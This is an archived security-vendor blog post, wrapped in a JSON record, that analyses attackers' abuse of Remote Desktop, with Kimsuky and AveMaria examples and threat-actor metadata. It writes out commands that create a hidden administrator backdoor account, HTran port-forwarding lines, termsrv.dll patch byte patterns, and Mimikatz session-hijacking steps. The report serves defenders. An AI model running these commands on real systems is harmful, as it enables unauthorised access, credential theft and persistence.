{ "id": "1e5bcaa5-f1b0-4c55-943e-b15289ec2f94", "created_at": "2026-04-06T00:19:14.382226Z", "updated_at": "2026-04-10T03:38:10.019649Z", "deleted_at": null, "sha1_hash": "26cd7f51e94c444b08a0b3bfb006dadff4b45a15", "title": "Analysis on Attack Techniques and Cases Using RDP", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1478571, "plain_text": "Analysis on Attack Techniques and Cases Using RDP\r\nBy ATCP\r\nPublished: 2022-10-11 · Archived: 2026-04-05 22:29:56 UTC\r\nOverview\r\nOne of the previous ASEC blog posts discussed cases where attackers abused various remote control tools that are\r\noriginally used for system management purposes to gain control over infected systems.[1] This post will cover\r\ncases where RDP (Remote Desktop Protocol), a default service provided by baseline Windows OS, was used.\r\nRDP is commonly used in most attacks, and this is because it is useful for initial compromise or lateral movement\r\nin comparison to remote control tools that require additional installation processes.\r\nThe Windows OS supports the Remote Desktop Services, and this can be used without the process of installing\r\nadditional remote control tools. This is only possible on the condition that the Remote Desktop Services is\r\nactivated. Otherwise, it can be activated through additional processes.\r\nFor initial compromise, attackers can use RDP to access and gain control over the target system when the system\r\ncredentials are obtained, and as this is the same for the lateral movement process, the collected credentials of the\r\ninternal network system can be used to spread the infection internally. Aside from this method, attackers also use\r\nmalware that adds an account to be used by the attacker to the infected system to maintain persistence.\r\nBelow is a summary of attack cases of such attacks as well as various techniques that can be used in RDP attacks\r\nalongside their respective tools.\r\nCases of Attacks\r\nCases of APT Attacks\r\nCases of attacks using RDP are commonly found in APT attacks in particular. In the ASEC blog post “Case of\r\nRansomware Infection in a Company Using Local Administrator Accounts Set with Same Password,” the team\r\ncovered a case where the attacker obtained the credentials of the local administrator of the target system before\r\nconnecting to it using RDP and installing the Lockis ransomware.[2]\r\nAlso, SSH and PsExec are used in various APT attacks by the Conti ransomware attack group[3] and the DarkSide\r\nransomware attack group.[4]\r\nAside from the remote desktop feature installed by default on Windows, there are cases where attackers install and\r\nuse RDP Wrapper. RDP Wrapper is an open source utility that supports the remote desktop feature. Since\r\nWindows OS does not support remote desktop in all versions, RDP Wrapper needs to be installed to enable the\r\nfeature. The Kimsuky group installs RDP Wrapper on multiple systems infected with AppleSeed.[5]\r\nAdding User Accounts\r\nhttps://asec.ahnlab.com/en/40394/\r\nPage 1 of 11\n\nUntil now, we have mostly covered methods where the user credentials of infected systems were stolen, then\r\nsubsequently used to access the system through RDP with the stolen information. However, multiple cases have\r\nbeen found recently where new users were added to infected systems, which were then used to gain access.\r\nThrough this method, attackers can maintain persistence and access the infected system anytime. As the newly\r\nadded account must not stand out to the existing users, techniques of hiding the added account are also used.\r\nKIMSUKY\r\nThe Kimsuky group has also distributed malware that adds user accounts to infected systems this way.\r\n[6]\r\n The PIF\r\ndropper malware disguised as attachments to spear phishing mails usually drop AppleSeed, but there are malware\r\nbeing distributed which are responsible for adding RDP users. These types of malware ultimately add the\r\nfollowing user account.\r\nUser account: default\r\nPassword: 1qaz2wsx#EDC\r\nThe malware adds an account by executing simple command line commands as shown below. When the\r\ncommands are over, that is, when the malware achieves its aim, it deletes itself using a batch file.\r\n\u003e net user /add default 1qaz2wsx#EDC\r\n\u003e net localgroup Administrators default /add\r\n\u003e net localgroup “Remote Desktop Users” default /add\r\n\u003e reg add “HKLM\\SOFTWARE\\Microsoft\\Windows\r\nNT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList” /v default /t REG_DWORD /d 0 /f\r\n\u003e reg add “HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server” /v fDenyTSConnections /t\r\nREG_DWORD /d 0 /f\r\nExamining each command shows that it uses net commands to register a user named “default.” The user is\r\nincluded in the admin group as well as the RDP group, so it appears that the account will later be used to access\r\nRDP. The malware then registers the added user account to the SpecialAccounts registry key so that the user\r\ncannot know that an account has been added in the login screen.\r\nMalware Targeting MS-SQL Servers\r\nRecently, there have been malware distributed to inappropriately-managed MS-SQL servers and adding user\r\naccounts to them. Deducing from the other malware installed in these systems, it is deemed that they were\r\ninstalled after dominating the systems via dictionary attacks due to the systems having vulnerable account\r\ncredentials. The malware in question is created with bat2exe, and upon execution, it generates and runs the\r\nfollowing batch file.\r\nhttps://asec.ahnlab.com/en/40394/\r\nPage 2 of 11\n\nThe features of the batch script are similar to the type used by the Kimsuky group explained above. It adds a user\r\naccount and registers it to SpecialAccounts to prevent users from noticing it. In addition, it adds firewall settings\r\nand activates the RDP service.\r\nTools for Adding Accounts\r\nAside from the malware that directly adds user accounts, attackers can also use publicly available tools to add user\r\naccounts. For example, CreateHiddenAccount below is a tool developed with GoLang, which is published on\r\nGitHub.[7] Attackers target inadequately managed MS-SQL servers and use the CreateHiddenAccount malware to\r\nadd user accounts without having to go through the complex processes above.\r\nRDP Related Malware\r\nREVERSE RDP\r\nEven if the infected system’s URL and account credentials are known, if they are on private networks, direct\r\naccess is not possible without settings such as port forwarding configured. As this is the same in most malware,\r\nhttps://asec.ahnlab.com/en/40394/\r\nPage 3 of 11\n\ninstead of the Reverse Shell where the attacker connects to the infected system first, the method where the\r\nmalware that operates in the infected system connects to the attacker, or C\u0026C server, is used.\r\nAveMaria uses RdpWrapper instead of the RDP provided by default in Windows.[8] In order to do this, it first\r\ndrops the RdpWrapper DLL onto the infected PC and registers it as a service. Afterward, it creates a random string\r\nand adds a user account as ID/PW. Then, it registers the added user account to the SpecialAccount registry key so\r\nthat the user cannot know that an account has been added. Lastly, the added ID/PW is added to the registry key\r\nshown below and saved.\r\nID : HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer[random] / rudp\r\nPassword : HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer[random] / rpdp\r\nAveMaria attempts to connect to the C\u0026C server afterwards using the Reverse RDP method, allowing the attacker\r\nto control the infected PC remotely via AveMaria.\r\nPORT FORWARDING\r\nPort forwarding is a feature where data transmitted from a certain port is forwarded to another port. Using this\r\nallows the malware to bypass NAT by communicating through the Reverse method just like AveMaria above and\r\nsimultaneously transmit the data to another port, the RDP port, to enable remote control.\r\nThere is a variety of tools that support port forwarding, but in this blog post, HTran will be the main example\r\nwhose source code has been made public and has been in use from the past. First, the following 3 modes are\r\nsupported on HTran.[9]\r\nhttps://asec.ahnlab.com/en/40394/\r\nPage 4 of 11\n\nOne of the modes provided by HTran is the “-listen” mode, which receives 2 port numbers as factors and binds to\r\neach port while idling. If connections are established using both factors, the data received from one port is\r\nforwarded to the other port. Ordinarily, the “=listen” mode will be used alongside the “-slave” mode. The “-slave”\r\nmode is similar to the “-tran” mode, and if the “-tran” mode awaits connections after opening a particular port of\r\nthe local system, the “-slave” mode connects directly to the designated address.\r\nThe following is a log where HTran malware with the name “p” was executed in the “-slave” mode. When it is run\r\nafter receiving these factors, it attempts to connect to the address A(1..**.8):1000, and when a connection is\r\nestablished, it is forwarded to the 3389 port of the local system.\r\n\u003e p 1..**.8 1000 127.0.0.1 3389\r\nIn the A:1000 system, HTran will be running in the “-listen” mode as shown below. (For example purposes, the\r\nfirst factor is set to 80.) Accordingly, the attacker accesses the A:80 address and is able to initiate RDP access on\r\nthe target system. HTran, which was running in A, forwards the data received from port 80 to port 1000, and this\r\nis because port 1000 is linked to the HTran running in the target system. Finally, the HTran of the target system\r\nforwards the transmitted data to the local system’s 3389 port.\r\n\u003e HTran.exe 1000 80\r\nMULTI RDP\r\nOnly 1 RDP per PC is allowed in a normal Windows environment. Because of this, even if the attacker knows the\r\naccount credentials of the infected system, he or she cannot make an RDP connection without the user realizing it\r\nif the user is performing a task locally or a user is currently accessing the system using RDP. This is because if the\r\nattacker attempts to connect with RDP while the current user is in the environment, the current user will be logged\r\noff.\r\nTo bypass such instances, the attacker may patch the memory of Remote Desktop Service to allow execution of\r\nmultiple remote desktop sessions. For instance, Mimikatz supports such a feature with the ts::multirdp command.\r\nhttps://asec.ahnlab.com/en/40394/\r\nPage 5 of 11\n\n[10]\r\n When the ts::multirdp command is used, the corresponding DLL address is found from the svchost.exe where\r\nthe currently running Remote Desktop Service, or termsrv.dll is loaded, before a certain binary pattern is searched\r\nfor. As the pattern is different for each Windows version, each version has a defined search pattern. When the\r\ndefined pattern exists, the malware patches it into a new one, allowing multiple RDP sessions to happen.\r\nKimsuky group also uses a malware responsible for memory patching for multiple RDP sessions, much like the\r\nfeature of Mimikatz.[11] It is a DLL just like most malware that are recently being used by the Kimsuky group and\r\nis executed by regsvr32.exe. The currently discovered sample is an x64 binary, so it only operates in the x64\r\nWindows architecture. Its search and patch patterns are similar to the source code of Mimikatz, but one difference\r\nis that it also supports the Windows XP version. The search patterns and patterns to be patched in each Windows\r\nversion are as follows:\r\nVersion (x64) Search Pattern Patch Pattern\r\nWindows XP (\r\n2600 ) or later\r\n{0x83, 0xf8, 0x02, 0x7f} {0x90, 0x90}\r\nWindows Vista (\r\n6000 )\r\n{0x8b, 0x81, 0x38, 0x06, 0x00,\r\n0x00, 0x39, 0x81, 0x3c, 0x06,\r\n0x00, 0x00, 0x75};\r\n{0xc7, 0x81, 0x3c, 0x06, 0x00,\r\n0x00, 0xff, 0xff, 0xff, 0x7f, 0x90,\r\n0x90, 0xeb};\r\nWindows 7 ( 7600\r\n)\r\n{0x39, 0x87, 0x3c, 0x06, 0x00,\r\n0x00, 0x0f, 0x84};\r\n{0xc7, 0x87, 0x3c, 0x06, 0x00,\r\n0x00, 0xff, 0xff, 0xff, 0x7f, 0x90,\r\n0x90};\r\nWindows 8.1 (\r\n9600 )\r\n{0x39, 0x81, 0x3c, 0x06, 0x00,\r\n0x00, 0x0f, 0x84};\r\n{0xc7, 0x81, 0x3c, 0x06, 0x00,\r\n0x00, 0xff, 0xff, 0xff, 0x7f, 0x90,\r\n0x90};\r\nWindows 10,\r\nVersion 1803 (\r\n17134 )\r\n{0x8b, 0x99, 0x3c, 0x06, 0x00,\r\n0x00, 0x8b, 0xb9, 0x38, 0x06,\r\n0x00, 0x00, 0x3b, 0xdf, 0x0f,\r\n0x84};\r\n{0xc7, 0x81, 0x3c, 0x06, 0x00,\r\n0x00, 0xff, 0xff, 0xff, 0x7f, 0x90,\r\n0x90, 0x90, 0x90, 0x90, 0xe9};\r\nWindows 10,\r\nVersion 1809 (\r\n17763 ) or later\r\n{0x8b, 0x81, 0x38, 0x06, 0x00,\r\n0x00, 0x39, 0x81, 0x3c, 0x06,\r\n0x00, 0x00, 0x0f, 0x84};\r\n{0xc7, 0x81, 0x3c, 0x06, 0x00,\r\n0x00, 0xff, 0xff, 0xff, 0x7f, 0x90,\r\n0x90, 0x90, 0x90, 0x90, 0x90,\r\n0x90, 0x90};\r\nTable 1. RDP service search and patch patterns\r\nStealing RDP Credentials\r\nIf the RDP account information can be obtained when the user accesses another internal system remotely, the\r\nstolen credentials can be used for lateral movement. In order to do this, attackers install keyloggers to collect\r\naccount information when users log in to the remote desktop, or steal RDP account credentials saved in the local\r\nhttps://asec.ahnlab.com/en/40394/\r\nPage 6 of 11\n\nsystem to steal credentials in other systems. Mimikatz can steal account information even when the current user is\r\nusing the remote desktop or when another user is logged in.\r\nWhen another user is logged into the current system with the remote desktop, using the ts::logonpasswords\r\ncommand of Mimikatz will extract and display the remote access credentials in the currently running session.\r\nBelow are the results shown when another user is logged into the current system with the domain_admin account.\r\n[12]\r\nIn contrast, when a user is working on another system by logging in via the remote desktop, the ts::mstsc\r\ncommand extracts and displays the credentials of the remote target from the currently running mstsc process. This\r\nmeans that when the ts::mstsc command of Mimikatz is executed while a user is logged into a system of another\r\npath with the domain_admin account, it becomes possible to steal the credentials used to log into the remote\r\nsystem.\r\nOrdinarily, if there is a target system where the remote desktop is frequently used, the ID and PW can be saved to\r\nenable automatic login instead of having to enter them every time. In this case, the RDP credentials are saved in\r\nthe local Vault. Because Mimikatz can steal the RDP credentials saved in this Vault with the vault::cred command,\r\neven if a remote connection is not established to the particular target, or even when another user is not remotely\r\nlogged in, if the RDP credentials are saved, they can be stolen.\r\nhttps://asec.ahnlab.com/en/40394/\r\nPage 7 of 11\n\nRDP HIJACKING\r\nRDP hijacking is a technique of intercepting another user’s remote desktop session for lateral movement. When\r\nthe attacker obtains system privileges in the current system, using the RDP hijacking technique will allow them to\r\nintercept the RDP session even if the credentials of other users are not known. Thus, an attacker who has stolen a\r\nsystem and obtained system privileges can use the remote desktop in the server to intercept sessions of other\r\nlogged in users and use these to access the system. This can be done both remotely and locally, regardless of the\r\nactivated or deactivated sessions, as long as the session is not logged out of.\r\nFor example, the attacker can use the terminal service console (tscon.exe) for RDP hijacking, and Mimikatz also\r\nsupports this with the “ts::remote” command. With the “privilege::debug” and “token::elevate” commands,\r\nMimikatz can also obtain system privileges. Afterwards, the current session can be identified using the\r\n“ts::sessions” command, and if the number of the target session for hijacking is 2, using the “ts::remote /id2”\r\ncommand will allow switching over to the target session.\r\nmimikatz # privilege::debug\r\nmimikatz # token::elevate\r\nmimikatz # ts::multirdp\r\nmimikatz # ts::sessions\r\nSession: 0 – Services\r\n…\r\nSession: *1 – Console\r\nstate: Active (0)\r\nuser : ahnlab_user @ DESKTOP\r\nConn : 2021-06-16 2:28:59 PM\r\ndisc : 2021-06-16 2:28:59 PM\r\nlogon: 2021-06-16 2:29:00 PM\r\nlast : 2021-06-16 2:28:59 PM\r\ncurr : 2021-06-16 2:31:16 PM\r\nhttps://asec.ahnlab.com/en/40394/\r\nPage 8 of 11\n\nlock : no\r\nSession: 2 – RDP-Tcp#2\r\nstate: Active (0)\r\nuser : ahnlab_user2 @ DESKTOP\r\nConn : 2021-06-16 2:31:07 PM\r\nlogon: 2021-06-16 2:31:08 PM\r\nlast : 2021-06-16 2:31:14 PM\r\ncurr : 2021-06-16 2:31:16 PM\r\nlock : no\r\naddr4: 192.168..\r\nSession: 65536 – RDP-Tcp\r\n…\r\nmimikatz # ts::remote /id:2\r\nAsking to connect from 2 to current session\r\nConnected to 2\r\nLateral Movement\r\nAs seen in the cases above, RDP is not only used for initial compromise but also frequently used for lateral\r\nmovement. The important fact is that even if the credentials of the target system are not known in plain text,\r\nlateral movement is possible via NT Hash. Even if the password is not in plain text, by using tools such as\r\nxfreerdp, the RDP protocol can also be used in Pass the Hash attacks where NT Hash is used, such as SMB and\r\nWMI.\r\nIf the “Restricted Admin Mode” is activated on the remote system, mstsc can be used as well. For reference, the\r\nfollowing registry settings must be configured to activate the restricted admin mode.\r\nHKLM\\SYSTEM\\CurrentControlSet\\Control\\LSA / “DisableRestrictedAdmin” (DWORD)\r\n0: Activate restricted admin mode\r\nIn the example below, the NT Hash of the obtained domain admin account was used to execute mstsc with the\r\nOverpass the Hash attack in “Restricted Admin Mode.” The mstsc pop-up below shows the text, “Windows login\r\ncredentials are used to connect”. Afterwards, it can be seen that entering the address of the remote system and\r\nattempting to connect will establish a connection without the need to input account information.\r\nhttps://asec.ahnlab.com/en/40394/\r\nPage 9 of 11\n\nConclusion\r\nAttackers have continuously been using RDP from the past in the initial compromise and lateral movement\r\nprocesses. Recently, instead of installing additional backdoor malware, a technique has been used to obtain control\r\nby adding user accounts. Because both the method of using stolen account information and the method of the\r\nattacker directly adding an account use the remote desktop service provided by default on Windows, adequate\r\nmanagement is required to detect or prevent them.\r\nUsers must refrain from opening attachments on suspicious emails, and when installing external software, it is\r\nadvised to purchase or download them from their official websites. Additionally, users must set a complex\r\npassword for their accounts and change them periodically. Also, V3 should be updated to the latest version so that\r\nmalware infection can be prevented.\r\n[File Detection]\r\n– Trojan/Win.Agent.C5245646 (2022.09.27.02)\r\n– Trojan/BAT.Agent.SC183591 (2022.09.27.03)\r\n– Malware/Win.Generic.C4933135 (2022.01.27.00)\r\n– HackTool/Win.UserAdd.C5271969 (2022.10.04.02)\r\nReference\r\n[1]\r\n [ASEC Blog] Attackers Abusing Various Remote Control Tools\r\n[2]\r\n [ASEC Blog] Case of Ransomware\r\nInfection in a Company Using Local Administrator Accounts Set with Same Password\r\n[3]\r\n [The DFIR Report] BazarLoader and the Conti Leaks\r\n[4]\r\n [Cyware] DarkSide: A Deep Dive Into The Threat Actor That Took Colonial Pipeline Down\r\n[5]\r\n [ASEC Blog] Analysis Report on Kimsuky Group’s APT Attacks (AppleSeed, PebbleDash)\r\n[6]\r\n [ASEC Blog] Analysis Report on Kimsuky Group’s APT Attacks (AppleSeed, PebbleDash)\r\n[7]\r\n [Github] CreateHiddenAccount\r\n[8]\r\n [ASEC Blog] AveMaria malware being distributed as spam mail\r\nhttps://asec.ahnlab.com/en/40394/\r\nPage 10 of 11\n\n[9]\r\n [ASEC Blog] Attackers Using FRP (Fast Reverse Proxy) to Attack Korean Companies\r\n[10]\r\n [AhnLab TIP] Analysis Report on Internal Web Spreading Methods Using Mimikatz\r\n[11]\r\n [ASEC Blog] Analysis Report on Kimsuky Group’s APT Attacks (AppleSeed, PebbleDash)\r\n[12]\r\n [AhnLab TIP] Analysis Report on Internal Web Spreading Methods Using Mimikatz\r\nMD5\r\n185bc3037314ec2dbd6591ad72cf08b4\r\n81ee91290a78d2d38b47a7ae25ec717f\r\nb500a8ffd4907a1dfda985683f1de1df\r\nAdditional IOCs are available on AhnLab TIP.\r\nURL\r\nhttp[:]//80[.]66[.]76[.]22/servicem[.]exe\r\nAdditional IOCs are available on AhnLab TIP.\r\nGain access to related IOCs and detailed analysis by subscribing to AhnLab TIP. For subscription details, click\r\nthe banner below.\r\nSource: https://asec.ahnlab.com/en/40394/\r\nhttps://asec.ahnlab.com/en/40394/\r\nPage 11 of 11", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://asec.ahnlab.com/en/40394/" ], "report_names": [ "40394" ], "threat_actors": [ { "id": "cf7fc640-acfe-41c4-9f3d-5515d53a3ffb", "created_at": "2023-01-06T13:46:38.228042Z", "updated_at": "2026-04-10T02:00:02.883048Z", "deleted_at": null, "main_name": "APT1", "aliases": [ "PLA Unit 61398", "Comment Crew", "Byzantine Candor", "Comment Group", "GIF89a", "Group 3", "TG-8223", "Brown Fox", "ShadyRAT", "G0006", "COMMENT PANDA" ], "source_name": "MISPGALAXY:APT1", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "191d7f9a-8c3c-442a-9f13-debe259d4cc2", "created_at": "2022-10-25T15:50:23.280374Z", "updated_at": "2026-04-10T02:00:05.305572Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "Kimsuky", "Black Banshee", "Velvet Chollima", "Emerald Sleet", "THALLIUM", "APT43", "TA427", "Springtail" ], "source_name": "MITRE:Kimsuky", "tools": [ "Troll Stealer", "schtasks", "Amadey", "GoBear", "Brave Prince", "CSPY Downloader", "gh0st RAT", "AppleSeed", "Gomir", "NOKKI", "QuasarRAT", "Gold Dragon", "PsExec", "KGH_SPY", "Mimikatz", "BabyShark", "TRANSLATEXT" ], "source_id": "MITRE", "reports": null }, { "id": "760f2827-1718-4eed-8234-4027c1346145", "created_at": "2023-01-06T13:46:38.670947Z", "updated_at": "2026-04-10T02:00:03.062424Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "G0086", "Emerald Sleet", "THALLIUM", "Springtail", "Sparkling Pisces", "Thallium", "Operation Stolen Pencil", "APT43", "Velvet Chollima", "Black Banshee" ], "source_name": "MISPGALAXY:Kimsuky", "tools": [ "xrat", "QUASARRAT", "RDP Wrapper", "TightVNC", "BabyShark", "RevClient" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "c8bf82a7-6887-4d46-ad70-4498b67d4c1d", "created_at": "2025-08-07T02:03:25.101147Z", "updated_at": "2026-04-10T02:00:03.846812Z", "deleted_at": null, "main_name": "NICKEL KIMBALL", "aliases": [ "APT43 ", "ARCHIPELAGO ", "Black Banshee ", "Crooked Pisces ", "Emerald Sleet ", "ITG16 ", "Kimsuky ", "Larva-24005 ", "Opal Sleet ", "Ruby Sleet ", "SharpTongue ", "Sparking Pisces ", "Springtail ", "TA406 ", "TA427 ", "THALLIUM ", "UAT-5394 ", "Velvet Chollima " ], "source_name": "Secureworks:NICKEL KIMBALL", "tools": [ "BabyShark", "FastFire", "FastSpy", "FireViewer", "Konni" ], "source_id": "Secureworks", "reports": null }, { "id": "71a1e16c-3ba6-4193-be62-be53527817bc", "created_at": "2022-10-25T16:07:23.753455Z", "updated_at": "2026-04-10T02:00:04.73769Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "APT 43", "Black Banshee", "Emerald Sleet", "G0086", "G0094", "ITG16", "KTA082", "Kimsuky", "Larva-24005", "Larva-25004", "Operation Baby Coin", "Operation Covert Stalker", "Operation DEEP#DRIVE", "Operation DEEP#GOSU", "Operation Kabar Cobra", "Operation Mystery Baby", "Operation Red Salt", "Operation Smoke Screen", "Operation Stealth Power", "Operation Stolen Pencil", "SharpTongue", "Sparkling Pisces", "Springtail", "TA406", "TA427", "Thallium", "UAT-5394", "Velvet Chollima" ], "source_name": "ETDA:Kimsuky", "tools": [ "AngryRebel", "AppleSeed", "BITTERSWEET", "BabyShark", "BoBoStealer", "CSPY Downloader", "Farfli", "FlowerPower", "Gh0st RAT", "Ghost RAT", "Gold Dragon", "GoldDragon", "GoldStamp", "JamBog", "KGH Spyware Suite", "KGH_SPY", "KPortScan", "KimJongRAT", "Kimsuky", "LATEOP", "LOLBAS", "LOLBins", "Living off the Land", "Lovexxx", "MailPassView", "Mechanical", "Mimikatz", "MoonPeak", "Moudour", "MyDogs", "Mydoor", "Network Password Recovery", "PCRat", "ProcDump", "PsExec", "ReconShark", "Remote Desktop PassView", "SHARPEXT", "SWEETDROP", "SmallTiger", "SniffPass", "TODDLERSHARK", "TRANSLATEXT", "Troll Stealer", "TrollAgent", "VENOMBITE", "WebBrowserPassView", "xRAT" ], "source_id": "ETDA", "reports": null }, { "id": "3aaf0755-5c9b-4612-9f0e-e266ef1bdb4b", "created_at": "2022-10-25T16:07:23.480196Z", "updated_at": "2026-04-10T02:00:04.626125Z", "deleted_at": null, "main_name": "Comment Crew", "aliases": [ "APT 1", "BrownFox", "Byzantine Candor", "Byzantine Hades", "Comment Crew", "Comment Panda", "G0006", "GIF89a", "Group 3", "Operation Oceansalt", "Operation Seasalt", "Operation Siesta", "Shanghai Group", "TG-8223" ], "source_name": "ETDA:Comment Crew", "tools": [ "Auriga", "Cachedump", "Chymine", "CookieBag", "Darkmoon", "GDOCUPLOAD", "GLOOXMAIL", "GREENCAT", "Gen:Trojan.Heur.PT", "GetMail", "Hackfase", "Hacksfase", "Helauto", "Kurton", "LETSGO", "LIGHTBOLT", "LIGHTDART", "LOLBAS", "LOLBins", "LONGRUN", "Living off the Land", "Lslsass", "MAPIget", "ManItsMe", "Mimikatz", "MiniASP", "Oceansalt", "Pass-The-Hash Toolkit", "Poison Ivy", "ProcDump", "Riodrv", "SPIVY", "Seasalt", "ShadyRAT", "StarsyPound", "TROJAN.COOKIES", "TROJAN.FOXY", "TabMsgSQL", "Tarsip", "Trojan.GTALK", "WebC2", "WebC2-AdSpace", "WebC2-Ausov", "WebC2-Bolid", "WebC2-Cson", "WebC2-DIV", "WebC2-GreenCat", "WebC2-Head", "WebC2-Kt3", "WebC2-Qbp", "WebC2-Rave", "WebC2-Table", "WebC2-UGX", "WebC2-Yahoo", "Wordpress Bruteforcer", "bangat", "gsecdump", "pivy", "poisonivy", "pwdump", "zxdosml" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434754, "ts_updated_at": 1775792290, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/26cd7f51e94c444b08a0b3bfb006dadff4b45a15.pdf", "text": "https://archive.orkl.eu/26cd7f51e94c444b08a0b3bfb006dadff4b45a15.txt", "img": "https://archive.orkl.eu/26cd7f51e94c444b08a0b3bfb006dadff4b45a15.jpg" } }